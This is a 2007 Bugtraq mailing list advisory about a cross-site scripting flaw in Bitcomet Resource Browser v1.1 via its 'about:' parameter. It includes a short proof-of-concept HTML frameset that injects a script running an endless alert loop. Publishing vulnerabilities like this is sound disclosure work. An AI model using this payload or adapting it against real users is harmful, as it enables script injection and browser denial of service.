Bugtraq mailing list archives

Bitcomet Resource Browser v1.1 XSS


From: jplopezy () gmail com
Date: 24 Nov 2007 04:33:40 -0000

The program is vulnerable to attacks of the kind xss the parameter "about:" scripts without authorization in the 
example that I am presenting is a page that runs a while with a msgbox infinity.

Create an html file and paste the following code

<html>

<frameset rows="100%">

  <frame src="about:<script>while(1)alert("Juan Pablo Lopez Yacubian")</script>">


</frameset>

</html>


Current thread: